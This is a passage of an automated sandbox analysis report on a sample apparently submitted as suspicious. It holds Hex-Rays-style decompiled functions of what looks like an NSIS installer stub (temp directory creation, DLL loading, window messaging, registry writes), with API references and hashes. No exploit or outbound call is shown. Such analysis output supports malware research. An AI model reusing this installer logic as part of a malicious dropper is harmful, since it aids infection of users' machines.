                                  				return _t17;
                                  			}








                                  0x004068b1
                                  0x004068ba
                                  0x004068bc
                                  0x004068bc
                                  0x004068c0
                                  0x004068d3
                                  0x004068cd
                                  0x004068cd
                                  0x004068cd
                                  0x004068ec
                                  0x00406900
                                  0x00406907

                                  APIs
                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                                  • wsprintfW.USER32 ref: 004068EC
                                  • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                  • String ID: %s%S.dll$UXTHEME$\
                                  • API String ID: 2200240437-1946221925
                                  • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                  • Instruction ID: 21628a1c63ce2f140fdd4d546058f3b0ba52bdb51e88dcb335987c0e659eada7
                                  • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                  • Instruction Fuzzy Hash: D0F0F671511119ABDB10BB64DD0DF9B376CBF00305F10847AA646F10D0EB7CDA68CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 702 405a6e-405ab9 CreateDirectoryW 703 405abb-405abd 702->703 704 405abf-405acc GetLastError 702->704 705 405ae6-405ae8 703->705 704->705 706 405ace-405ae2 SetFileSecurityW 704->706 706->703 707 405ae4 GetLastError 706->707 707->705
                                  C-Code - Quality: 100%
                                  			E00405A6E(WCHAR* _a4) {
                                  				struct _SECURITY_ATTRIBUTES _v16;
                                  				struct _SECURITY_DESCRIPTOR _v36;
                                  				int _t22;
                                  				long _t23;
                                  
                                  				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                  				_v36.Owner = 0x4083f8;
                                  				_v36.Group = 0x4083f8;
                                  				_v36.Sacl = _v36.Sacl & 0x00000000;
                                  				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                  				_v16.lpSecurityDescriptor =  &_v36;
                                  				_v36.Revision = 1;
                                  				_v36.Control = 4;
                                  				_v36.Dacl = 0x4083e8;
                                  				_v16.nLength = 0xc;
                                  				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
                                  				if(_t22 != 0) {
                                  					L1:
                                  					return 0;
                                  				}
                                  				_t23 = GetLastError();
                                  				if(_t23 == 0xb7) {
                                  					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
                                  						goto L1;
                                  					}
                                  					return GetLastError();
                                  				}
                                  				return _t23;
                                  			}







                                  0x00405a79
                                  0x00405a7d
                                  0x00405a80
                                  0x00405a86
                                  0x00405a8a
                                  0x00405a8e
                                  0x00405a96
                                  0x00405a9d
                                  0x00405aa3
                                  0x00405aaa
                                  0x00405ab1
                                  0x00405ab9
                                  0x00405abb
                                  0x00000000
                                  0x00405abb
                                  0x00405ac5
                                  0x00405acc
                                  0x00405ae2
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00405ae4
                                  0x00405ae8

                                  APIs
                                  • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                                  • GetLastError.KERNEL32 ref: 00405AC5
                                  • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405ADA
                                  • GetLastError.KERNEL32 ref: 00405AE4
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A94
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                  • API String ID: 3449924974-3081826266
                                  • Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                  • Instruction ID: 637b0a295f6611997b04f2fb2f8121e2d74ae93851c1d74b8ff7b710bfe1865b
                                  • Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
                                  • Instruction Fuzzy Hash: 1A010871D04219EAEF019BA0DD84BEFBBB4EB14314F00813AD545B6281E7789648CFE9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 708 732f1817-732f1856 call 732f1bff 712 732f185c-732f1860 708->712 713 732f1976-732f1978 708->713 714 732f1869-732f1876 call 732f2480 712->714 715 732f1862-732f1868 call 732f243e 712->715 720 732f1878-732f187d 714->720 721 732f18a6-732f18ad 714->721 715->714 724 732f187f-732f1880 720->724 725 732f1898-732f189b 720->725 722 732f18af-732f18cb call 732f2655 call 732f1654 call 732f1312 GlobalFree 721->722 723 732f18cd-732f18d1 721->723 745 732f1925-732f1929 722->745 729 732f191e-732f1924 call 732f2655 723->729 730 732f18d3-732f191c call 732f1666 call 732f2655 723->730 727 732f1888-732f1889 call 732f2b98 724->727 728 732f1882-732f1883 724->728 725->721 731 732f189d-732f189e call 732f2e23 725->731 740 732f188e 727->740 733 732f1885-732f1886 728->733 734 732f1890-732f1896 call 732f2810 728->734 729->745 730->745 743 732f18a3 731->743 733->721 733->727 749 732f18a5 734->749 740->743 743->749 750 732f192b-732f1939 call 732f2618 745->750 751 732f1966-732f196d 745->751 749->721 758 732f193b-732f193e 750->758 759 732f1951-732f1958 750->759 751->713 756 732f196f-732f1970 GlobalFree 751->756 756->713 758->759 760 732f1940-732f1948 758->760 759->751 761 732f195a-732f1965 call 732f15dd 759->761 760->759 762 732f194a-732f194b FreeLibrary 760->762 761->751 762->759
                                  C-Code - Quality: 88%
                                  			E732F1817(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                  				void _v36;
                                  				char _v136;
                                  				struct HINSTANCE__* _t37;
                                  				intOrPtr _t42;
                                  				void* _t48;
                                  				void* _t49;
                                  				void* _t50;
                                  				void* _t54;
                                  				intOrPtr _t57;
                                  				signed int _t61;
                                  				signed int _t63;
                                  				void* _t67;
                                  				void* _t68;
                                  				void* _t72;
                                  				void* _t76;
                                  
                                  				_t76 = __esi;
                                  				_t68 = __edi;
                                  				_t67 = __edx;
                                  				 *0x732f506c = _a8;
                                  				 *0x732f5070 = _a16;
                                  				 *0x732f5074 = _a12;
                                  				 *((intOrPtr*)(_a20 + 0xc))( *0x732f5048, E732F1651);
                                  				_push(1); // executed
                                  				_t37 = E732F1BFF(); // executed
                                  				_t54 = _t37;
                                  				if(_t54 == 0) {
                                  					L28:
                                  					return _t37;
                                  				} else {
                                  					if( *((intOrPtr*)(_t54 + 4)) != 1) {
                                  						E732F243E(_t54);
                                  					}
                                  					_push(_t54);
                                  					E732F2480(_t67);
                                  					_t57 =  *((intOrPtr*)(_t54 + 4));
                                  					if(_t57 == 0xffffffff) {
                                  						L14:
                                  						if(( *(_t54 + 0x1010) & 0x00000004) == 0) {
                                  							if( *((intOrPtr*)(_t54 + 4)) == 0) {
                                  								_push(_t54);
                                  								_t37 = E732F2655();
                                  							} else {
                                  								_push(_t76);
                                  								_push(_t68);
                                  								_t61 = 8;
                                  								_t13 = _t54 + 0x1018; // 0x1018
                                  								memcpy( &_v36, _t13, _t61 << 2);
                                  								_t42 = E732F1666(_t54,  &_v136);
                                  								 *(_t54 + 0x1034) =  *(_t54 + 0x1034) & 0x00000000;
                                  								_t18 = _t54 + 0x1018; // 0x1018
                                  								_t72 = _t18;
                                  								_push(_t54);
                                  								 *((intOrPtr*)(_t54 + 0x1020)) = _t42;
                                  								 *_t72 = 4;
                                  								E732F2655();
                                  								_t63 = 8;
                                  								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
                                  							}
                                  						} else {
                                  							_push(_t54);
                                  							E732F2655();
                                  							_t37 = GlobalFree(E732F1312(E732F1654(_t54)));
                                  						}
                                  						if( *((intOrPtr*)(_t54 + 4)) != 1) {
                                  							_t37 = E732F2618(_t54);
                                  							if(( *(_t54 + 0x1010) & 0x00000040) != 0 &&  *_t54 == 1) {
                                  								_t37 =  *(_t54 + 0x1008);
                                  								if(_t37 != 0) {
                                  									_t37 = FreeLibrary(_t37);
                                  								}
                                  							}
                                  							if(( *(_t54 + 0x1010) & 0x00000020) != 0) {
                                  								_t37 = E732F15DD( *0x732f5068);
                                  							}
                                  						}
                                  						if(( *(_t54 + 0x1010) & 0x00000002) != 0) {
                                  							goto L28;
                                  						} else {
                                  							return GlobalFree(_t54);
                                  						}
                                  					}
                                  					_t48 =  *_t54;
                                  					if(_t48 == 0) {
                                  						if(_t57 != 1) {
                                  							goto L14;
                                  						}
                                  						E732F2E23(_t54);
                                  						L12:
                                  						_t54 = _t48;
                                  						L13:
                                  						goto L14;
                                  					}
                                  					_t49 = _t48 - 1;
                                  					if(_t49 == 0) {
                                  						L8:
                                  						_t48 = E732F2B98(_t57, _t54); // executed
                                  						goto L12;
                                  					}
                                  					_t50 = _t49 - 1;
                                  					if(_t50 == 0) {
                                  						E732F2810(_t54);
                                  						goto L13;
                                  					}
                                  					if(_t50 != 1) {
                                  						goto L14;
                                  					}
                                  					goto L8;
                                  				}
                                  			}


















                                  0x732f1817
                                  0x732f1817
                                  0x732f1817
                                  0x732f1824
                                  0x732f182c
                                  0x732f1839
                                  0x732f1847
                                  0x732f184a
                                  0x732f184c
                                  0x732f1851
                                  0x732f1856
                                  0x732f1978
                                  0x732f1978
                                  0x732f185c
                                  0x732f1860
                                  0x732f1863
                                  0x732f1868
                                  0x732f1869
                                  0x732f186a
                                  0x732f1870
                                  0x732f1876
                                  0x732f18a6
                                  0x732f18ad
                                  0x732f18d1
                                  0x732f191e
                                  0x732f191f
                                  0x732f18d3
                                  0x732f18d3
                                  0x732f18d4
                                  0x732f18dd
                                  0x732f18de
                                  0x732f18e8
                                  0x732f18eb
                                  0x732f18f0
                                  0x732f18f7
                                  0x732f18f7
                                  0x732f18fd
                                  0x732f18fe
                                  0x732f1904
                                  0x732f190a
                                  0x732f1917
                                  0x732f1918
                                  0x732f191b
                                  0x732f18af
                                  0x732f18af
                                  0x732f18b0
                                  0x732f18c5
                                  0x732f18c5
                                  0x732f1929
                                  0x732f192c
                                  0x732f1939
                                  0x732f1940
                                  0x732f1948
                                  0x732f194b
                                  0x732f194b
                                  0x732f1948
                                  0x732f1958
                                  0x732f1960
                                  0x732f1965
                                  0x732f1958
                                  0x732f196d
                                  0x00000000
                                  0x732f196f
                                  0x00000000
                                  0x732f1970
                                  0x732f196d
                                  0x732f187a
                                  0x732f187d
                                  0x732f189b
                                  0x00000000
                                  0x00000000
                                  0x732f189e
                                  0x732f18a3
                                  0x732f18a3
                                  0x732f18a5
                                  0x00000000
                                  0x732f18a5
                                  0x732f187f
                                  0x732f1880
                                  0x732f1888
                                  0x732f1889
                                  0x00000000
                                  0x732f1889
                                  0x732f1882
                                  0x732f1883
                                  0x732f1891
                                  0x00000000
                                  0x732f1891
                                  0x732f1886
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x732f1886

                                  APIs
                                    • Part of subcall function 732F1BFF: GlobalFree.KERNEL32 ref: 732F1E74
                                    • Part of subcall function 732F1BFF: GlobalFree.KERNEL32 ref: 732F1E79
                                    • Part of subcall function 732F1BFF: GlobalFree.KERNEL32 ref: 732F1E7E
                                  • GlobalFree.KERNEL32 ref: 732F18C5
                                  • FreeLibrary.KERNEL32(?), ref: 732F194B
                                  • GlobalFree.KERNEL32 ref: 732F1970
                                    • Part of subcall function 732F243E: GlobalAlloc.KERNEL32(00000040,?), ref: 732F246F
                                    • Part of subcall function 732F2810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,732F1896,00000000), ref: 732F28E0
                                    • Part of subcall function 732F1666: wsprintfW.USER32 ref: 732F1694
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.778451619.00000000732F1000.00000020.00000001.01000000.00000004.sdmp, Offset: 732F0000, based on PE: true
                                  • Associated: 00000000.00000002.778443971.00000000732F0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000000.00000002.778458851.00000000732F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  • Associated: 00000000.00000002.778463521.00000000732F6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_732f0000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: Global$Free$Alloc$Librarywsprintf
                                  • String ID:
                                  • API String ID: 3962662361-3916222277
                                  • Opcode ID: 92ee769c458d7c80fbc6a8c710bde8783b3bc4cf66cf529b70c03836182ce9e6
                                  • Instruction ID: ddcc686e8ac433b3b9c043cd9311021c347fa113a83800d791dee4a184f8cd14
                                  • Opcode Fuzzy Hash: 92ee769c458d7c80fbc6a8c710bde8783b3bc4cf66cf529b70c03836182ce9e6
                                  • Instruction Fuzzy Hash: FB41DA756003479BEB019F34D988B95B7ACBF05310F984469ED0B9A1C9DBB8E1C4CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 765 401c43-401c63 call 402d84 * 2 770 401c65-401c6c call 402da6 765->770 771 401c6f-401c73 765->771 770->771 773 401c75-401c7c call 402da6 771->773 774 401c7f-401c85 771->774 773->774 777 401cd3-401cfd call 402da6 * 2 FindWindowExW 774->777 778 401c87-401ca3 call 402d84 * 2 774->778 790 401d03 777->790 788 401cc3-401cd1 SendMessageW 778->788 789 401ca5-401cc1 SendMessageTimeoutW 778->789 788->790 791 401d06-401d09 789->791 790->791 792 402c2a-402c39 791->792 793 401d0f 791->793 793->792
                                  C-Code - Quality: 59%
                                  			E00401C43(intOrPtr __edx) {
                                  				int _t29;
                                  				long _t30;
                                  				signed int _t32;
                                  				WCHAR* _t35;
                                  				long _t36;
                                  				int _t41;
                                  				signed int _t42;
                                  				int _t46;
                                  				int _t56;
                                  				intOrPtr _t57;
                                  				struct HWND__* _t63;
                                  				void* _t64;
                                  
                                  				_t57 = __edx;
                                  				_t29 = E00402D84(3);
                                  				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                  				 *(_t64 - 0x18) = _t29;
                                  				_t30 = E00402D84(4);
                                  				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                  				 *(_t64 + 8) = _t30;
                                  				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
                                  					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
                                  				}
                                  				__eflags =  *(_t64 - 0x1c) & 0x00000002;
                                  				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
                                  					 *(_t64 + 8) = E00402DA6(0x44);
                                  				}
                                  				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
                                  				_push(1);
                                  				if(__eflags != 0) {
                                  					_t61 = E00402DA6();
                                  					_t32 = E00402DA6();
                                  					asm("sbb ecx, ecx");
                                  					asm("sbb eax, eax");
                                  					_t35 =  ~( *_t31) & _t61;
                                  					__eflags = _t35;
                                  					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32); // executed
                                  					goto L10;
                                  				} else {
                                  					_t63 = E00402D84();
                                  					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                  					_t41 = E00402D84(2);
                                  					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                  					_t56 =  *(_t64 - 0x1c) >> 2;
                                  					if(__eflags == 0) {
                                  						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
                                  						L10:
                                  						 *(_t64 - 0x38) = _t36;
                                  					} else {
                                  						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
                                  						asm("sbb eax, eax");
                                  						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                                  					}
                                  				}
                                  				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
                                  				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
                                  					_push( *(_t64 - 0x38));
                                  					E00406484();
                                  				}
                                  				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t64 - 4));
                                  				return 0;
                                  			}















                                  0x00401c43
                                  0x00401c45
                                  0x00401c4c
                                  0x00401c4f
                                  0x00401c52
                                  0x00401c5c
                                  0x00401c60
                                  0x00401c63
                                  0x00401c6c
                                  0x00401c6c
                                  0x00401c6f
                                  0x00401c73
                                  0x00401c7c
                                  0x00401c7c
                                  0x00401c7f
                                  0x00401c83
                                  0x00401c85
                                  0x00401cda
                                  0x00401cdc
                                  0x00401ce7
                                  0x00401cf1
                                  0x00401cf4
                                  0x00401cf4
                                  0x00401cfd
                                  0x00000000
                                  0x00401c87
                                  0x00401c8e
                                  0x00401c90
                                  0x00401c93
                                  0x00401c99
                                  0x00401ca0
                                  0x00401ca3
                                  0x00401ccb
                                  0x00401d03
                                  0x00401d03
                                  0x00401ca5
                                  0x00401cb3
                                  0x00401cbb
                                  0x00401cbe
                                  0x00401cbe
                                  0x00401ca3
                                  0x00401d06
                                  0x00401d09
                                  0x00401d0f
                                  0x00402ba4
                                  0x00402ba4
                                  0x00402c2d
                                  0x00402c39

                                  APIs
                                  • SendMessageTimeoutW.USER32 ref: 00401CB3
                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: MessageSend$Timeout
                                  • String ID: !
                                  • API String ID: 1777923405-2657877971
                                  • Opcode ID: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                                  • Instruction ID: 549e056fbb7746b1afa8e7352ee9f1cbf83a3633853e14f9ff1f16dc1dd81c22
                                  • Opcode Fuzzy Hash: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                                  • Instruction Fuzzy Hash: 46219C7190420AAFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 796 40248a-4024bb call 402da6 * 2 call 402e36 803 4024c1-4024cb 796->803 804 402c2a-402c39 796->804 806 4024cd-4024da call 402da6 lstrlenW 803->806 807 4024de-4024e1 803->807 806->807 808 4024e3-4024f4 call 402d84 807->808 809 4024f5-4024f8 807->809 808->809 814 402509-40251d RegSetValueExW 809->814 815 4024fa-402504 call 4032b4 809->815 818 402522-402603 RegCloseKey 814->818 819 40251f 814->819 815->814 818->804 819->818
                                  C-Code - Quality: 83%
                                  			E0040248A(void* __eax, int __ebx, intOrPtr __edx, void* __eflags) {
                                  				void* _t20;
                                  				void* _t21;
                                  				int _t24;
                                  				long _t25;
                                  				int _t30;
                                  				intOrPtr _t33;
                                  				void* _t34;
                                  				intOrPtr _t37;
                                  				void* _t39;
                                  				void* _t42;
                                  
                                  				_t42 = __eflags;
                                  				_t33 = __edx;
                                  				_t30 = __ebx;
                                  				_t37 =  *((intOrPtr*)(_t39 - 0x20));
                                  				_t34 = __eax;
                                  				 *(_t39 - 0x10) =  *(_t39 - 0x1c);
                                  				 *(_t39 - 0x44) = E00402DA6(2);
                                  				_t20 = E00402DA6(0x11);
                                  				 *(_t39 - 4) = 1;
                                  				_t21 = E00402E36(_t42, _t34, _t20, 2); // executed
                                  				 *(_t39 + 8) = _t21;
                                  				if(_t21 != __ebx) {
                                  					_t24 = 0;
                                  					if(_t37 == 1) {
                                  						E00402DA6(0x23);
                                  						_t24 = lstrlenW(0x40b5f0) + _t29 + 2;
                                  					}
                                  					if(_t37 == 4) {
                                  						 *0x40b5f0 = E00402D84(3);
                                  						 *((intOrPtr*)(_t39 - 0x38)) = _t33;
                                  						_t24 = _t37;
                                  					}
                                  					if(_t37 == 3) {
                                  						_t24 = E004032B4( *((intOrPtr*)(_t39 - 0x24)), _t30, 0x40b5f0, 0x1800); // executed
                                  					}
                                  					_t25 = RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x44), _t30,  *(_t39 - 0x10), 0x40b5f0, _t24); // executed
                                  					if(_t25 == 0) {
                                  						 *(_t39 - 4) = _t30;
                                  					}
                                  					_push( *(_t39 + 8));
                                  					RegCloseKey(); // executed
                                  				}
                                  				 *0x434f88 =  *0x434f88 +  *(_t39 - 4);
                                  				return 0;
                                  			}













                                  0x0040248a
                                  0x0040248a
                                  0x0040248a
                                  0x0040248a
                                  0x0040248d
                                  0x00402494
                                  0x0040249e
                                  0x004024a1
                                  0x004024aa
                                  0x004024b1
                                  0x004024b8
                                  0x004024bb
                                  0x004024c1
                                  0x004024cb
                                  0x004024cf
                                  0x004024da
                                  0x004024da
                                  0x004024e1
                                  0x004024eb
                                  0x004024f1
                                  0x004024f4
                                  0x004024f4
                                  0x004024f8
                                  0x00402504
                                  0x00402504
                                  0x00402515
                                  0x0040251d
                                  0x0040251f
                                  0x0040251f
                                  0x00402522
                                  0x004025fd
                                  0x004025fd
                                  0x00402c2d
                                  0x00402c39

                                  APIs
                                  • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsw2F33.tmp,00000023,00000011,00000002), ref: 004024D5
                                  • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsw2F33.tmp,00000000,00000011,00000002), ref: 00402515
                                  • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsw2F33.tmp,00000000,00000011,00000002), ref: 004025FD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778015938.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778022993.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778039326.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778046146.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID: CloseValuelstrlen
                                  • String ID: C:\Users\user\AppData\Local\Temp\nsw2F33.tmp
                                  • API String ID: 2655323295-1221114612
                                  • Opcode ID: bd51451fa2ef528cdea9a187014f9e15a2c5fc70eee7c119300a555a695e43e9
                                  • Instruction ID: a32c4fc66ba480c3aafb49ec1434dbeb720bd0d2787204a1d049ba7b64bbfaa1
                                  • Opcode Fuzzy Hash: bd51451fa2ef528cdea9a187014f9e15a2c5fc70eee7c119300a555a695e43e9
                                  • Instruction Fuzzy Hash: 8B118E71E00119BEEF10AFA5DE49EAEBAB8FF44358F15443AF504F61C1D7B88D40AA58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040605C(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                  				intOrPtr _v8;
                                  				short _v12;
                                  				short _t12;
                                  				intOrPtr _t13;
                                  				signed int _t14;
                                  				WCHAR* _t17;
                                  				signed int _t19;
                                  				signed short _t23;
                                  				WCHAR* _t26;
                                  
                                  				_t26 = _a4;
                                  				_t23 = 0x64;
                                  				while(1) {
                                  					_t12 =  *L"nsa"; // 0x73006e
                                  					_t23 = _t23 - 1;
                                  					_v12 = _t12;
                                  					_t13 =  *0x40a57c; // 0x61
                                  					_v8 = _t13;
                                  					_t14 = GetTickCount();
                                  					_t19 = 0x1a;
                                  					_v8 = _v8 + _t14 % _t19;
                                  					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
                                  					if(_t17 != 0) {
                                  						break;
                                  					}
                                  					if(_t23 != 0) {
                                  						continue;
                                  					} else {
                                  						 *_t26 =  *_t26 & _t23;
                                  					}
                                  					L4:
                                  					return _t17;
                                  				}
                                  				_t17 = _t26;
                                  				goto L4;
                                  			}












                                  0x00406062
                                  0x00406068
                                  0x00406069
                                  0x00406069
                                  0x0040606e
                                  0x0040606f
                                  0x00406072
                                  0x00406077
                                  0x0040607a
                                  0x00406084
                                  0x00406091
                                  0x00406095
                                  0x0040609d
                                  0x00000000
                                  0x00000000
                                  0x004060a1
                                  0x00000000
                                  0x004060a3
                                  0x004060a3
                                  0x004060a3
                                  0x004060a6
                                  0x004060a9
                                  0x004060a9
                                  0x004060ac
                                  0x00000000

                                  APIs
                                  • GetTickCount.KERNEL32 ref: 0040607A
                                  • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040352B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406095
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.777947969.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.777940223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777964906.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777971054.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.777977082.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.778005953.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
